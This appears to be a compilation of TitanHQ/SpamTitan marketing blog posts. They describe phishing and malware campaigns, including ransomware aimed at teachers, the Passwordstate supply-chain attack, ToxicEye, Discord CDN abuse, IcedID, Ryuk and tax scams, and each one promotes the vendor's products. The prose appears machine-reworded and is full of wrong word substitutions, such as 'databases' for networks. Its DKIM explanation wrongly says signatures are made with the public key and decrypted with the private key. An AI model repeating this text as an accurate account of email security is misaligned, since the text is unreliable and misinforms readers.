A recently-discovered phishing attack is attempting to invade messages sent between students and teachers. In the campaign an email is spoofed to look like it was sent from the parent of a student. However it includes an attachment file with a malicious macro. The message informs the teacher that an earlier message with a student assignment did not successfully reach their inbox.
It appears that the phishers came into possession of a directory of teacher email addresses via faculty contact lists available on a school website. The message looks extremely authentic as it includes the teacher’s name. Once the malicious file is opened, the macro downloads the ransomware executable files.
Some new tactics seen in this campaign include an SMS alerting the phisher once a recipient downloads the file and the use of Go programming language to create the malicious file. Files encrypted by the ransomware are listed in a text file named “About_Your_Files.txt” and stored on the user’s desktop.
Schools are an attractive target for phishers as they, typically, do no have massive funds to invest in cybersecurity. However, there are a number of measures that schools should introduce, as a minimum, to prevent attacks like this infiltrating their databases.
Email filters will block ransomware attachments before they reach targeted user inboxes. They spot malicious messages and files and place them in a quarantine folder where they can be reviewed by a system administrators to see if they are a false positive. If this is the case then the mail can be sent to the intended recipient.
Backups come into play once a database has been encrypted. They allow schools and other organizations to restore data without handing over any requested ransom. Best practice in this regard is to store backups off-site. Cloud backups are primarily used in disaster recovery strategies required after a ransomware attack. Training and user education is another security measure. Cybersecurity training will help teaching staff identify the tell tale signs of a phishing email and cut off the attack as soon as it begins.
The vast majority of schools have begun to implement digital means of communicating and working with students and parents. This a very efficient way of corresponding and allowed education to continue during all of the COVID-19 enforced lockdowns. However, this also brings new challenges for educational bodies. Cybersecurity may only have been a minimal concern ten years ago but now it needs to be tackled head on to avoid students and staff becoming the victims of hackers.
One very useful tool is WebTitan on-the go (OTG) for Chromebooks. This will allow your organization to safeguard all of your Chromebook users from the dangers associated with online usage. This security solution has been specifically created with the education sector in mind. Along with supporting CIPA compliance it is an inexpensive security filtering solution for Chromebooks.
Schools implementing the use of WebTitan Chromebook client can simply pply policies for all of their Chromebook users by group.
A cybercriminal group has managed to leverage email alerts, sent to notify users of an available update, in order to infect databases with malware.
The software update feature of the Passwordstate password manager was infiltrated to attack enterprise users of the password manager solution. The supply chain attack also successfully targets account holders with malware known as Moserpass at different points from April 20 to April 22.
Anyone who sought to avail of an update using the In-Pass Upgrade mechanism was potentially in receipt of the malicious file downloaded titled Passwordstate_upgrade.zip file.
If the file was installed then it will kick off a chain of events allowing Moserpass to become active and gathering valuable information to any linked device or network in tandem with password data from the Passwordstate app. The malware also had a loader feature which may allow for the download of other malware strains onto victims’ devices. Due to the fact that passwords may have been stolen, impacted have been warned to change all of their passwords.
While the cyberattack was mitigated in less that 30 hours device users were issued to a request from Click Studios, the developer of the password app, to apply a hotfix to remove the malware from their systems. Sadly, having discovered the requests being shared via social media platforms, the hackers shared an identical email to conduct a phishing campaign who provided a link to a website that they controlled. As opposed to a fix to remove the Moserpass malware, an updated version of Moserpass malware was shared to anyone unfortunate enough to fall for the scam.
The email were, naturally enough, extremely realistic and recipients who followed the instructions in the email would likely think they were removing malware, when they were actually downloading it. The fake versions of the emails do not include a domain suffix used by Click Studios, request the hotfix is installed from a subdomain, and claim an ‘urgent’ update is necessary toto fix a bug, but it is easy to see how these messages could trick end users.
Click Studios provided password management services for approximately 29,000 companies and the solution has hundreds of thousands of users, many of whom will have heard of the breach and be worried about a malware infection. Click Studios said only a very small number of its customers were affected and had the malware installed – those who downloaded the update in the 28-hour period between April 20 and April 22 – but anyone receiving the fake email could well have been convinced that the email was genuine and implemented the download as directed.
It is a common tactic of cybercriminals to attempt and leverage fake security warnings to conduct attack, and data breach notifications are perfect to deploy in phishing attacks. This Passswordstate breach notification phishing campaign shows how crucial it is to double check every message for any indication of phishing, even if the email content appears to be authentic and the message includes what looks like the proper logos etc., and the dangers of posting copies of genuine breach notification letters on social media networks.
Many phishing attacks are complex by their nature, and it can be trciky for email recipients to spot that what is genuine and what is malicious. This is why your group requires an advanced spam and phishing security solution. If you want the best defenses against phishing, contact TitanHQ now and see how SpamTitan Email Security can enhance your security and keep your organization safe from phishing and other email-based attacks.
The popularity of the Telegram messaging platform has grown a lot in recent years, with massive migration in WhatsApp users jumping ship following amendments to that service’s privacy and data management policies.
In particular Telegram has been widely used by hackers to conduct malware campaigns. Recently, a campaign has been discovered that shares a new malware strain called ToxicEye. ToxicEye malware is a Remote Access Trojan (RAT) that gives hackers complete management of an infected device. The malware is used to exfiltrate sensitive data and download other malware strains.
The malware takes advantage of the command and control server communications of Telegram accounts. Using the hacker’s Telegram account, an infected can be managed using ToxicEye to steal data and share more malicious payloads.
Telegram is a popular messaging service with over 63 million downloads and has approximately 500 million active users globally. IN particular there has been massive growth since the beginning of the COVID 19 pandemic with the app being implemented by many businesses who have been using it to allow their remote workers to communicate and collaborate. The app supports secure, private messaging and most companies allow Telegram to be implemented and do not block or audit communications.
Creating a Telegram account is simple and hackers can hide their identity. All that is needed to create an account is a mobile phone number, and the communication infrastructure permits hackers to easily steal data and send files to malware-infected devices unnoticed.
Telegram is also being implemented for sharing malware. Hackers can set up an account, use a Telegram bot to interact with other users and send files, and it is also possible to share files to non-Telegram users via phishing emails with malicious attachments. It is phishing emails that are being used to share ToxicEye malware. Emails are issued with a .exe file attachment, with one campaign using a file titled “paypal checker by saint.exe” to download the malware.
If the attachment is opened and initiated, a connection will be made to Telegram which allows malware to be downloaded by the hacker’s Telegram bot. The attackers can carry out a variety of malicious activities once the malware is in place, with the main goals of the cybercriminals being gathering information about the infected device, locating and exfiltrating passwords, and exfiltrating cookies and browser histories.
ToxicEye malware can disable active processes and take management of Task Manager, capture audio and video, remove clipboard contents, and launch other malware strains – including keyloggers and ransomware.
TitanHQ has two solutions available that can safeguard your network and devices from ToxicEye and other Telegram-based phishing and malware campaigns. SpamTitan is a strong email security solution that will prevent malicious emails sharing the executable files that download the ToxicEye RAT and other malware. For even more security, SpamTitan should be connected to WebTitan web security. WebTitan is a DNS-based web filtering service that can be set up to prevent access to Telegram if it is not in use and review traffic in real time to discover possibly dangerous message.
To find out more about these solutions, how much it costs, and to register for a free trial, get in touch with TitanHQ now.
Cybercriminals have long targeted cloud-based instant messaging service which provide easily communication between users. One of the these services that was recently leveraged by hackers is Discord, The platform is now being extensively used to spread phishing and malware.
VoIP, instant messaging and digital distribution is available from Discord and, due to this, it was used by gaming community before gaining more popularity among a wider variety of users. 150 million users worldwide were registered during 2019 and the surge in membership has continued since then. Additionally, the service has, for some time, been use by cybercriminals vie the platform’s live chat feature for selling and trading stolen data, anonymous communications, and to act as C2 servers for communicating with malware-infected devices.
Throughout 2021, the service has been widely used for sharing malware variants including information stealers, cryptocurrency miners, Remote Access Trojans, and ransomware by abusing the cdn.discordapp.com service.
Similar to other collaboration apps, Discord uses content delivery networks (CDNs) for storing shared files within channels. Hackers can place malicious files on Discord and create a public link for sharing, and that link can be shared with anyone, not just Discord users. The URL generated for sharing begins with https://cdn.discordapp.com/ so anyone who is sent the link will see that the link is for a legitimate site. While there are controls to stop malicious files from being uploaded, in a lot of cases hackers can bypass those protections have get their malicious files hosted, and alerts are not always shown to users about the risk of clicking on files from Discord. Since the malicious payloads are sent over encrypted HTTPS, the downloads can be masked from security solutions.
Additionally, once uploaded, the malware can be removed from a thread, but it is still accessible using the public URL. Users are often fooled into installing these malicious files under the guise of pirated software or games. Gamers have been focused on as their PCs typically have a high spec for gaming, which makes them perfect for cryptocurrency mining.
This style of malware campaign means that malware developers and distributers can simply share their malicious payloads with a high degree of anonymity. A review by Zscaler discovered over 100 unique malware samples from Discord in the Zscaler cloud in just a two-month time space. Another review of Discord CDN results discovered approximately 20,000 results on VirusTotal.
Discord is not the sole communication and collaboration solution to be leveraged by hackers. Slack and Telegram are also being abused in phishing campaigns and for malware campaigns.
If you would like to enhance email security get in touch with TitanHQ now to discover more about these award-winning cybersecurity solutions.
Despite the fact that the vast majority of companies invest in the training for the workforce and implement security measures to protect their networks and data from cybercriminals, security breaches still happen which exposed huge amounts of sensitive data.
Recently, cybercriminals illegally obtained more than 3.2 million data records from DriveSure, a training site used to help car dealerships sell and retain customers. This data had been stored in the company’s MySQL database, and the credentials for that and other data points had been publicly exposed on the Internet.
DriveSure has millions of customers that subscribe for access to its training and course material. Those customers provided names, addresses, phone numbers, emails, vehicle VIN numbers, service records, and damage claims among many other pieces of information. The breach resulted in data from large corporate accounts being exposed and military addresses being compromised.
Previously in 2021, experts discovered this information had been published on a number of hacking forums. While the majority of cybercriminals sell data like this for a profit, in this case, hackers did not seem interested in making money. Instead the hacker made the entire database of stolen data available for free and did not request any payment. The attacker’s motives remain unclear, but actions like this are often a way for hackers to make a name for themselves and gain respect among the hacking community.
Whatever the motive, the data was made available free of charge on many hacking forums and was available to anyone who wanted to download the files. As more people downloaded the files, the data started to appear in other locations as other hackers started sharing the data. Any user who subscribed to DriveSure needs to make sure their passwords are changed.
Apart from the private sensitive data leaked online, the individual responsible for the DriveSure breach made over 93,000 bcrypt hashed passwords available for download. In a secure application, the developer saves a password as a hashed value with a salt to make it more difficult to figure out. The bcrypt function is standard for hashing passwords, so DriveSure used a cryptographically secure way to store passwords. Even if a password is cryptographically secure, downloaded passwords can be brute forced as brute force tactics can be conducted for longer as there are no restrictions on the number of attempts.
The problem with having hashed passwords available is that a hacker can spend days running scripts against all of them. Any poor passwords can be brute forced, and many users employ the same password across multiple sites. Since email addresses are also available, an attacker can use scripts to take over accounts across multiple sites using the same passwords stolen from the DriveSure site. Further, while the company encrypted data according to compliance standards, but much of the data was stored in plaintext.
With such a large amount of data available, it is certain to be used in phishing and email spoofing attacks. Cybercriminals will be able to create convincing phishing campaigns using information in the data set, so businesses nee to be alert to the risk an should implement measures to block attacks. An email security solution such as SpamTitan can ensure the leaked database cannot be used in a phishing or email spoofing attack on the business, by ensuring those messages are blocked and not delivered to inboxes. Additionally, it is recommended to provide security awareness training to the workforce teaching employees cybersecurity best practices such as not reusing passwords on multiple accounts and how to identify phishing attacks.
Cybercriminals are constantly coming up with new ways to infiltrate databases in order to maximise the return on the investment they make in these attacks.
Even so, campaigns involving the use of spam and phishing emails remain the most witnessed attack vectors for spreading delivering malware. However, a new method has been identified recently in a campaign conducted by the threat group managing the IcedID banking Trojan cum malware downloader. This new method involves hijacking contact forms on company web pages. Contact forms are a feature of the vast majority of websites and are used to gather information on website visitors for follow up contacts. More often than not these forms have CAPTCHA security measures to safeguard the form from malicious campaigns.
Despite this those responsible for the IcedID banking Trojan have discovered a workaround to avoid the CATCHA security measures and, due to this, have been able to implement contact forms to deliver malicious emails. The emails the the contact forms transmit are normally sent to to inboxes that have whitelisted their email address. This means that that avoid email security gateways.
In the IceID campaign, the contact forms are being implemented to share messages claiming the recipient is going to be subjected to a legal action in relation to a copyright violation. The messages submitted claim the company has incorporated images on its web page, added without the image owner’s explicit authorization. The recipient is informed that a legal action will commence message if the images are not immediately removed from the website at once. It also provides a hyperlink to a Google Site that lists details of the copyrighted images and proof they are the intellectual property of the sender of the message.
If the hyperlink is visited to review the supplied evidence then the browser will install a zip file containing an obfuscated .js downloader that will send the IcedID payload. Once IcedID is placed, it will deliver secondary payloads such as TrickBot, Qakbot, and Ryuk ransomware.
IcedID distribution has been on the rise recently, not only via this attack vector but also in phishing campaigns. A large-scale phishing drive has been discovered that employs a range of business-themed lures in phishing campaigns with Excel attachments that have Excel 4 macros that transmit the banking Trojan.
The surge in IcedID malware distribution is thought to be just one element of a campaign to infect large numbers of devices to evolve a botnet that can be rented out to other cybercriminal collectives under the malware-as-a-service model. Now that the Emotet botnet has been deactivated there is a gap in the market for something like this and IcedID seems to be trying to take advantage of this.
If you would like to discover how you can safeguard your company from IceID and other malware attacks, at a reasonable price, contact the TitanHQ as soon as you can to see how TitanHQ email and web security measures are give 5-star recommendations from users for security, cost, simplicity, and customer service and support.
In 2020, ransomware attacks increased and soaring and phishing and email impersonation attacks were witnessed at worryingly high levels.
Specialists in cybersecurity have already calculated that 2020 saw a global cost to businesses caused by ransomware will come in around $20bn. It has also be predicted that the ransomware will remain the main attack vector of hackers for years to come as it is a proven way of earning money for these groups.
The main focus of these attacks has always been large companies due to the huge amounts of personal data they manages and the potential for using this in identity theft campaigns. Smaller companies are a less attractive target. However, they also manage considerable amounts of customer data and attacks can still be return a lot of money for hackers. While the large enterprises are a lucrative target they can be tricky to infiltrate as they invest so much in cybersecurity measures. As smaller enterprises would not have a large budget to invest in cybersecurity they can have a number of weaknesses that would make them much easier for hackers to infiltrate.
This is why small to medium enterprises are often targeted with phishing campaign. Should a phishing email makes it to an employee inbox, there is a good possibility that he message will be opened and important details will be compromised or malware will be downloaded.
The 2018 KnowBe4 Phishing Industry Benchmarking Report shows that on average, the probability of an employee clicking on a malicious hyperlink or taking another fraudulent request is 27%. That means one in four employees will click a link in a phishing email or obey a fraudulent request.
In these phishing emails the sender of the message is spoofed so the email looks like it was shared from a known individual or company. The email will feature an authentic email address on a known business domain. Without proper security measures configured, that message will land in inboxes and many staff members are likely to be tricked into sharing their credentials or open an infected file which downloads malware. More often than not, they will not realize they have been tricked.
One way of blocking these phishing messages from landing in staff inboxes is to apply Domain-based Message Authentication, Reporting and Conformance (DMARC) rules. Simply put, DMARC includes two technologies – Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM).
SPF is a DNS-based filtering security measure that helps to discover spoofed messages. SPF established authorized sender IP addresses on DNS servers. Recipient servers carry out lookups on the SPF records to make sure that the sender IP is one of the authorized vendors on the group’s DNS servers. If there is a match the message is sent to the requested inbox. If the check does not match, the message is rejected or quarantined.
DKIM includes the use of an encrypted signature to prove who the sender is. That signature is created using the organization’s public key and is decrypted using the private key available to the email server. DMARC rules are then applied to either reject or quarantine messages that do not meet the authentication requirements. Quarantining messages is useful as it means network managers can review to see if genuine emails have not been flagged by mistake.
Reports can be made available d to monitor email activity and network managers can see the number of messages that are being rejected or dropped. A quick rise in the number of rejected messages indicates an attack is current.
DMARC might appear complicated. However, if it is set proper properly it will prove an invaluable security tool that defends against phishing and dangerous email content.
TitanHQ’s anti-phishing and anti-spam service used DMARC to prevent email impersonation attacks in addition to advanced anti-malware features such as a Bitdefender-powered sandbox. For more details about tackling email impersonation on your organization contact TitanHQ now.
Those responsible for Gootloader target susceptible WordPress websites and generate hundreds of pages of fake content, often totally unconnected to the theme of the website. A wide variety of websites have been impacted across many industry sectors, including retail, education, healthcare, travel, music, and many more, with the common denominator that they all leverage the WordPress CMS.
It is not yet known how the WordPress sites have been infected. It is possible that the sites have not been updated to the most recent WordPress version or had vulnerable plugins that were targeted. Legitimate admin accounts could have been hacked using brute force tactics, or other methods may have been employed.
The content placed on the compromised sites takes the format of forum posts and fake message forums, providing answers to specific questions. The questions are mostly linked to certain types of legal agreements and other documents. A review of the campaign by eSentire researchers found the majority of the posts on the compromised websites included the word “agreement”. The posts feature a question, such as “Do I need a party wall agreement to sell my house?” with a post added below using the exact same search term that users can click to install a template agreement.
These pages have very specific questions for which there are minimal search engine results, so when search engines crawl the websites, the content ranks highly in the SERPs for that specific search term. There may be relatively few people searching for these particular search terms, but most of those that do are looking for a sample agreements and will download them and unwittingly install malware.
The content placed on the websites contains malicious code that displays the malicious forum posts only to visitors from certain places, with an underlying blog post that at first appears authentic, but is mostly gibberish. The blog post will be displayed to all visitors who are not being actively targeted. The campaign uses black hat SEO techniques to get the content listed in the SERPs, which will eventually be deleted by the likes of Google; however, that process may take some time and there are new questions and answers constantly being created to ensure Gootloader survives.
A new malware variant being referred to as Saint Bot malware is being shared using phishing emails that feature a Bitcoin-themed lure. As Bitcoin values continue surge upwards it is thought that the lure will be more effective than ever and fool many into clicking on the attached files to use the bitcoin wallet.
The phishing emails inform the recipient that a Bitcoin wallet in the included Zip file. The Zip file comes with a text file with instructions and a LNK file that has an embedded PowerShell script. A PowerShell downloader installs an obfuscated .Net dropper and downloader, which will then load a BAT script that disables Windows Defender and the Saint Bot malware binary. If someone should follows these instructions it will set off a process that will result in the Saint Bot malware being installed on the device.
A feature of the Saint Bot malware dropper is that is can deliver secondary payloads including information stealers, although it can be used to drop any possible strain of malware. This new strain was initially discovered by researchers at Malwarebytes. They found that there are no novel techniques at play with this malware. However, appears that the malware is being continually evolved. Currently, detections have been at a comparatively minimal but Saint Bot malware could grow into a serious threat for email users.
Once installed the malware can find out if it is in a controlled environment and will remove itself should that be the case. Conversely, should it not be a controlled environment the malware will communicate with its hard-coded command and control servers, send information collated from the infected system, and install secondary payloads to the infected device using Discord.
The malware is not characteristic of a particular threat group and could well be shared to multiple actors using darknet hacking forums, but it could well become a significant threat and be used in widespread campaigns to take advantage of the opportunity in the malware-as-a-service (MaaS) market created by the takedown of the Emotet Trojan.
Safeguarding your database from malware downloaders such as Saint Bot malware requires a defense in depth approach. The simplest method of preventing infections is to implement an advanced spam filtering solution such as SpamTitan to block the phishing emails that spread the malware. Antivirus software should also be configured on all endpoints and set to update automatically, and communication with the C2 servers should be tackled using firewall rules.
Along with technical security, it is crucial to conduct security awareness training to the workforce to help staff spot malicious emails and show them how to react when a possible threat is discovered.
The chance for cybercriminals to make massive profits by filing fake tax return submissions is significant, many time leasing to refunds of thousands of dollars being processed by the U.S. Internal Revenue Service (IRS). Every year tax workers being sent a range of IRS phishing messages that seek to steal sensitive data that can be leverage by the cybercriminals to illegally obtain identities and send in fraudulent tax returns using their victims detail.
In 2021 many tax season phishing scams have been uncovered including the subject lines such as “Tax Refund Payment” and “Recalculation of your tax refund payment” that tries to trick the recipient’s into opening the emails. The emails feature the authentic IRS logo and tells recipients that they qualify for an additional tax refund, but in order to be transferred the payment they must click a link and fill out a form. The form in question looks like a real IRS.gov form, with the page an exact replica of the IRS website, although the website on which the form is displayed is not an official IRS portal.
The form seeks a wide range of private personal information to be supplied so that the refund can be processed. The form requests the individual’s identity, birth data, Social Security information, driver’s license number, existing address, and electronic filing PIN. For extra realism, the phishing portal also shows a popup notification saying, “This US Government System is for Authorized Use Only”, which is the same warning message that is displayed on the genuine IRS website.
The cybercriminals look like they are focusing on universities and other educational bodies, both public and private, profit and nonprofit with many of the reported phishing emails from staff and students with .edu email addresses.
Educational agencies should employ measure to mitigate the chance of their staff and students being tricked by these scams. Warning all .edu account holders to warn them about the campaign is crucial, particularly as these messages are getting around Office 365 anti-phishing measures and are landing in inboxes.
Any educational entity that depends on Microsoft Exchange Online Protection (EOP) for preventing spam and phishing emails – EOP is the default protection provided free with Office 365 licenses – should strongly think about enhancing anti-phishing security with a third-party spam filter.
SpamTitan has been created to supply better protection for Office 365 environments. The solution used along with Office 365 and easily integrates with Office 365 email while greatly improving spam and phishing email security, dual antivirus engines and sandboxing provide excellent security from malware.
To find out more in relation to SpamTitan anti-phishing security for higher education institutions call Spam. You can avail of a free trial to allow you to assess the solutions prior to deciding to buy it.
A new PayPal phishing scam has been discovered that tries to steal an extensive amount of personal data from victims by pretending to be a PayPal security warning.
Fake PayPal Email Alerts
The emails seem to have been issued from PayPal’s Notifications Center and inform users that their account has been temporarily closed due to an attempt to log into their account from a previously unknown browser or device.
The emails feature a hyperlink that users are advised to click to log in to PayPal to verify their identity. A button is included in the email which users are told to visit a “Secure and update my account now !” link. The hyperlink is a shortened bit.ly address, that brings the victim to a spoofed PayPal page on a htacker-controlled domain using a redirect mechanism.
If the link is visited, the user is shown with a spoofed PayPal login. After entering PayPal account details, the victim is asked to enter a range of sensitive data to prove their identity as part of a PayPal Security check. The information must be provided to unlock the account, with the list of steps listed on the page along with the progress that has been made toward accessing the account.
AT first the hackers ask for the user’s full name, billing address, and phone number. Then they miust sharetheir credit/debit card details in full. The next page asks for the user’s date of birth, social security number, ATM or Debit Card PIN information, and finally the user is required to send a proof of identity document, which must be either a scan of a credit card, passport, driver’s license, or a government-issued photo Identification card.
Request for Excessive Data
This PayPal phishing campaign seeks an extensive amount of data, which should serve as an alert that all is not what it appears, especially the request to enter highly sensitive data including a Social Security number and PIN.
There are also indicators in the email that the request is not what it appears. The email is not sent from a domain linked with PayPal, the message begins with “Good Morning Customer” and not the account holder’s name, and the notice included at the bottom of the email advising the user to mark whitelist the sender if the email was sent to the spam folder is poorly composed. However, the email has been written to get the recipient to move quickly to prevent financial loss. As with other PayPal phishing campaigns, many users are likely to be tricked into sharing at least some of their personal data.
Consumers need to always be extremely careful caution and should never reply instantly to any email that warns of a security breach, instead they should stop and consider their next move prior to doing anything and carefully check the sender of the email and text. To review if there exists a genuine issue with the account, the PayPal website should be visited by viewing the proper URL into the address bar of the browser. URLs in emails should never be clicked on.
To discover more about current phishing campaigns and some of the key security measures you can put in place to enhance your protection from these campaigns, get in touch with the SpamTitan team now.
On how many times have you received a phone call or an email from a manager in your group requesting he password of an employee to allow them to log onto their email account?
This request is typically issued when an employees is on annual leave and a call is received from a client or co-worker wishing to know if they have completed a request sent before they left. More often than not a client has sent an email to their account manager before he or she went on vacation, but it was accidentally neglected.
Access to the email account is crucial to prevent embarrassment or to ensure that a sales opportunity is not gone a begging. Maybe the specific employee has failed to configure their Out of Office reply and clients are not aware that they need to get in touch with a different person to get their questions addressed.
In years previously, managers used to maintain a log of all users’ passwords in a file on their computer. Should an emergency occur, they could discover the password and access any user account. However, this is dangerous. Nowadays this is not an acceptable thing to do. It also compromises the privacy of employees. If a password is known by any other person, there is nothing to prevent that person from using those login details any time they like. Since passwords are often used for personal accounts as well as work accounts, sharing that password could compromise the individual’s personal accounts also.
Keeping lists of passwords also makes it more difficult to take action over inappropriate internet and email usage. If a password has been shared, there is no way of ascertaining whether an individual has broken the law or breached company policies. It could have been someone else using that person’s login credentials.
IT workers are therefore not allowed to share passwords. Instead they must reset the user’s password, create a temporary one, and the user will need to reset it when they go back to work. Many managers will be ill at ease with these procedures and will still want to maintain their lists. Workers will be unhappy as they often use their work email accounts to send personal emails. Resetting a password and sharing manager access could be perceived as a major invasion of privacy.
However, there is an easy solution which will ensure that the privacy of individuals is assured, while forgotten Out of Office auto-responders can be created. Crucial emails will not go unnoticed either. To complete this you can establish shared mailboxes, although these are not always popular.
If this is done in Outlook and a manager may need to set it up in their Outlook program. It will also be a requirement for them to guide staff members how to use the shared mailboxes, and policies might need to be devised. They may have to permanently keep the mailboxes of multiple teams open in Outlook.
There is a different option, and that is to share permissions. It is more difficult to set up this control as it requires an MS Exchange Administrator to allow Delegate Access. Using Delegate Access will make it possible for a person, with the appropriate authorizations, to share an email on behalf of another staff member. This means mailboxes do not have to be accessible all the time. They can just be opened when an email must be sent. This may be perfect, but it will not allow a manager to implement a forgotten Out-of-Office auto-responder.
That would mean a member of the IT department such a domain manager would have to create it. A ticket would need to be filed requesting the action to be completed. This may not be desirable with managers, but it is the only way for the task to be completed without sharing the user’s login credentials or creating up a temporary password which would breach their privacy.
Groups must tackle an ever-growing threat from hackers. In 2019 and 2020, we have witnessed many high-profile data breaches, leading to significant financial repercussions and damaged brand reputation. Password-sharing at work comes with a huge danger for groups. 81% of breaches begin with stolen or weak passwords. When cybercriminals obtain entry to your database, shared passwords make it easier for them to access other sections of your network.
Multi-Factor Authentication to Prevent Password Sharing
When MFA is configured, access is only allowed when the user approves the use of two authentication factors. For instance, they initially complete the password process and then must complete another authentication request. This could be a code sent to a device. Multi-factor authentication, like any security process, works best when employed along with other security strategies.
If a complete ban on password sharing in not in place in your organization, it must be set up as soon as possible. To discover more in relation to password security and some of the key protections you can implement to enhance your resilience against attacks, contact the SpamTitan team now.
TitanHQ has been awarded for its email security, web cyber security, and email archiving solutions, being given three awards from Expert Insights.
Expert Insights was created in 2018 to help companie identify cybersecurity solutions to safeguard their networks and devices from an ever-increasing amount of cyber threats. Identifying cybersecurity solutions can be a long process, and the insights and information made available by Expert Insights considerably shortens that process. Unlike many resources listing the best software solutions, Expert Insights has ratings from verified users of the products to provide users of the resource valuable insights about how simple products are to use and how effective they are at preventing threats. Expert Insights has assisted more than 100,000 businesses choose cybersecurity solutions and the website is used by over 40,000 people every month.
Once annually, Expert Insights recognizes the best and most innovative cybersecurity solutions available in its “Best-Of” Awards. The editorial team at Expert Insights reviews vendors and their products on a variety of criteria, such as technical features, ease-of-use, market presence, and reviews by verified users of the solutions. Every product is reviewed by technology experts to decide the winners in a broad range of categories, including cloud, email, endpoint, web, identity, and backup cybersecurity.
Craig MacAlpine, CEO and Founder, Expert Insights saidL: “2020 was an unprecedented year of cybersecurity challenges, with a rapid rise in remote working causing a massive acceleration in cybercrime. Expert Insights’ Best-Of awards are designed to recognize innovative cybersecurity providers like TitanHQ that have developed powerful solutions to keep businesses safe against increasingly sophisticated cybercrime.”
Three TitanHQ cybersecurity products were chosen and named winners in the Expert Insights’ 2021 “Best-Of” Awards in the Email Security Gateway, Web Security, and Email Archiving categories. SpamTitan took the title for Best Email Security Gateway, WebTitan won the Web Security award and ArcTitan was picked as winner in the Email Archiving category. SpamTitan and WebTitan were acknowledged for the level of security supplied, while being among the simplest to use and most cost-effective solutions in their respective categories.
All three products are consistently identified as best in class in relation to the level of protection provided and are a bit hit with enterprises, SMBs, and MSPs. The solutions are given many 5-star reviews from real users on the Expert Insights site and many other review web portals, including Capterra, GetApp, Software Advice, Google Reviews, and G2 Crowd. The cybersecurity solutions are now deployed by more than 8,500 companies and over 2,500 MSPs.
Ronan Kavanagh, CEO, TitanHQ said: “The recent pandemic and the growth of remote working initiatives have further highlighted the need for multiple layers of cybersecurity and our award-winning solutions form key pillars in this security strategy. We will continue to innovate and provide solutions that MSPs can use to deliver a consistent, secure and reliable experience to their customers.”
One of the most dangerous ransomware groups has amended the ransomware it is using, adding worm-like capabilities that can lead to it self-propagating and being distributed to other devices on the local database.
Ryuk ransomware initially came on the scene during the summer of 2018 and has evolved to become one of the most serious strains of ransomware. It is thought that the ransomware attacks are being conducted by an Eastern European threat group referred to as Wizard Spider, aka UNC1878.
In 2020, Ryuk ransomware was witnessed being included in ransomware attacks on large groups and companies. While some ransomware gangs opted to leave frontline healthcare organizations out of their attacks, that was not so with Ryuk. In fact, the threat group initiated a major campaign specifically targeting the healthcare sector in the United States. In October 2020, the gang targeted 6 U.S. hospitals in a single day. If security experts had not discovered a plan by the gang to attack around 400 hospitals, the campaign would have been much more successful.
The ransomware remediation company Coveware said that Ryuk ransomware was the third most prolific ransomware strain during 2020 and was deployed in 9% of all ransomware attacks. A review of the Bitcoin wallets linked with the gang suggest more than $150 million in ransoms have been transferred to the gang.
Ryuk ransomware is always being updated. The Ryuk gang was one of the first ransomware operators to use double-extortion tactics first launched by the operators of Sodinokibi and Maze ransomware, which include stealing data before the use of encryption and threatening to publish or sell the stolen data if the ransom is not transferred.
Ryuk ransomware was also amended to allow it to attack and encrypt the drives of remote computers. The ransomware uses the ARP table on a compromised device to capture a list of IP addresses and mac addresses, and a wake-on-LAN packet is shared to the devices to power them up to permit them to be encrypted.
The most recent update was first seen by the French national cybersecurity agency ANSSI during an incident response it managed in January. ANSSI discovered the most recent strain had worm-like capabilities that allow it to propagate automatically and infect all devices within the Windows domain. Every reachable device on which Windows RPC accesses are possible can be attacked and encrypted.
Ryuk is a human-operated ransomware strain, but the new update will greatly cut the manual tasks that need to be completed. This will allow the group to complete a greater number of attacks and will cut the amount of time from infection to encryption, which gives security teams even less time to identify and address an attack in progress.
While various methods are used for first access, Ryuk ransomware is usually shared by a malware dropper such as Emotet, TrickBot, Zloader, Qakbot, Buer Loader, or Bazar Loader. These malware droppers are distributed using phishing and spear phishing emails. Approximately 80% of Ryuk ransomware attacks use phishing emails as the first attack vector.
Once a device has been infiltrated it is often too late to spot and prevent the attack before data theft and file encryption, especially since the attacks normally take place overnight and during the weekend when IT teams are depleted. The best security is to prevent the initial attack vector: The phishing emails that distribute the malware droppers.
Having an advanced spam filtering solution in place is crucial for preventing Ryuk ransomware attacks. By spotting and quarantining the phishing emails and blocking them from reaching inboxes, the malware droppers that deliver Ryuk will not be installed.
To prevent these attacks, think about augmenting your email security tactics with SpamTitan. SpamTitan is an award-winning email security solution that will prevent phishing emails that deliver malware downloaders.
To discover more, callthe SpamTitan team or start a free trial of the solution now.
Wit the advent of tax season the arrival of the annual scams targeting tax professionals has also begun. Every year as the tax filing deadline approaches, hackers conduct scams in order to steal electronic filing identification numbers (EFINs).
In the United States, the Internal Revenue Service (IRS) allocates EFINS to tax professionals and individuals to allow them to file tax returns digitally. If hackers get hold of obtain these EFINs they can file fraudulent tax returns in victims’ names to obtain tax rebates. once in possession of an e-file number of a tax professional tax returns can be submitted for many individuals, so these scams can be very profitable.
These scams typically begin with a phishing email using a trick the someone into visiting a malicious website where they are asked to hand over information or upload documents that contain sensitive data. Alternatively, recipients are told to install software allows the hackers full control of the victim’s device.
In a lot of cases the spam emails pretend to be the IRS informing tax professionals to provide information or documents in order to stop the suspension of their account. When met with this threat, tax professionals may provide the requested details.
One of the phishing emails recently uncovered pretended to be from the IRS by using the sender name “IRS Tax E-Filing,” with the subject line “Verifying your EFIN before e-filing.” The emails looked real and required “authorized e-file originators” to reverify before filing returns through the IRS system. The emails claimed the IRS had begun using this new security measure to prevent unauthorized and fraudulent behaviour. The scammers asked for a PDF file/scan of the EFIN acceptance letter and both sides of the person’s driver’s license. Similar scams have been completed that require tax preparers’ ID numbers and e-services usernames and passwords to be handed over.
This year, along with the normal phishing emails spoofing the IRS, campaigns have been discovered where the hackers claim to be possible clients searching for tax preparers ahead of the filing deadline. Attachments are provided that would normally be required by tax preparers, but they are laced with malicious scripts that download keylogging malware that records and exfiltrates keystrokes, with are likely to include usernames and passwords.
Tax experts that fall victim to these scams can have catastrophic damage inflicted on their good name, so it is crucial to use caution when opening any emails and to stop and think carefully about handing over sensitive information or downloading files or software
One of the simplest ways to safeguard from these scams is to put in place an advanced spam filtering solution that can identify and block these dangerous messages. SpamTitan is a powerful email security solution that identifies and prevents malware and documents containing malicious scripts with dual antivirus engines, sandboxing, and machine learning methods. Along with blocking malware threats, SpamTitan is excellent for blocking phishing emails containing malicious URLs.
The award-winning spam filter is simple and straightforward to configure and manage, requiring no technical know how. For more details about SpamTitan, call the the SpamTitan team now.
